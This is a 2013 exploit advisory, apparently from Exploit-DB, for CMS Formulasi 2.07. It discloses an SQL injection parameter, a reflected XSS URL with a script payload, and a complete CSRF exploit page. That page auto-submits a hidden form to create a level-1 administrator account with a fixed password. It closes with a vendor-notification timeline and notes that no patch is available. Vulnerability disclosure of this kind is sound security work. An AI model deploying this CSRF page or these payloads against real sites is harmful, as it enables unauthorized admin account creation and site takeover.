CMS Formulasi 2.07 - Multiple Vulnerabilities

EDB-ID:

28712

CVE:





Platform:

PHP

Date:

2013-10-04


###################################################################################################################

  ______                                __                                       ______                      
 /      \                              /  |                                     /      \                     
/000000  |  ______    ______   ______  00 |____   _____  ____    ______        /000000  |  ______    _______ 
00 \__00/  /      \  /      \ /      \ 00      \ /     \/    \  /      \       00 \__00/  /      \  /       |
00      \  000000  |/000000  |000000  |0000000  |000000 0000  | 000000  |      00      \ /000000  |/0000000/ 
 000000  | /    00 |00 |  00/ /    00 |00 |  00 |00 | 00 | 00 | /    00 |       000000  |00    00 |00 |      
/  \__00 |/0000000 |00 |     /0000000 |00 |  00 |00 | 00 | 00 |/0000000 |      /  \__00 |00000000/ 00 \_____ 
00    00/ 00    00 |00 |     00    00 |00 |  00 |00 | 00 | 00 |00    00 |      00    00/ 00       |00       |
 000000/   0000000/ 00/       0000000/ 00/   00/ 00/  00/  00/  0000000/        000000/   0000000/  0000000/ 
                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
###################################################################################################################

# Exploit Title: CMS Formulasi 2.07 Multiple Vulnerability
# Date: 30 Sep 2013
# Vendor Homepage: http://formulasi.or.id/
# Software Link: http://cms.formulasi.or.id/p/download-cms-formulasi-terbaru.htm
# Version: 2.07
# Tested on: Win 7/Backtrack
# CVE :
# Exploit Author: Sarahma Security
# Author Homepage: http://sarahma.co.id
# Author Email: research@sarahma.co.id

========================
SQL Injection
========================
Found on
http://localhost/formulasi/kelas-siswa.html 
parameter : kelas
post data : kelas=1{SQL_HERE}



========================
XSS Vulnerability
========================
Found On
parameter : tgl
http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>


========================
CSRF Vulnerability
========================


---------------------BOF--------------------------------------------------
<html>
<head>
<title>Formulasi CRSFT Exploit</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "489","36","27" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>Formulasi CRSFT Exploit</H2>
<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">
<input type="hidden" name="nama_admin" value="usernya"/>
<input type="hidden" name="username" value="Sarahma12"/>
<input type="hidden" name="email" value="research@sarahma.co.id"/>
<input type="hidden" name="level_users" value="1"/>
<input type="hidden" name="password" value="Password12"/>
<input type="hidden" name="password_lagi" value="Password12"/>
</form>
</body>
</html>
---------------------EOF--------------------------------------------------


========================
Solution :
========================
No Update Until This Advisory published
 

========================
Timeline:
========================
2013-09-27 Provided details vulnerability to vendor
2013-10-01 Second NotificaTon Vendor
2013-10-04 No Response From Vendor
2013-10-05 Advisory published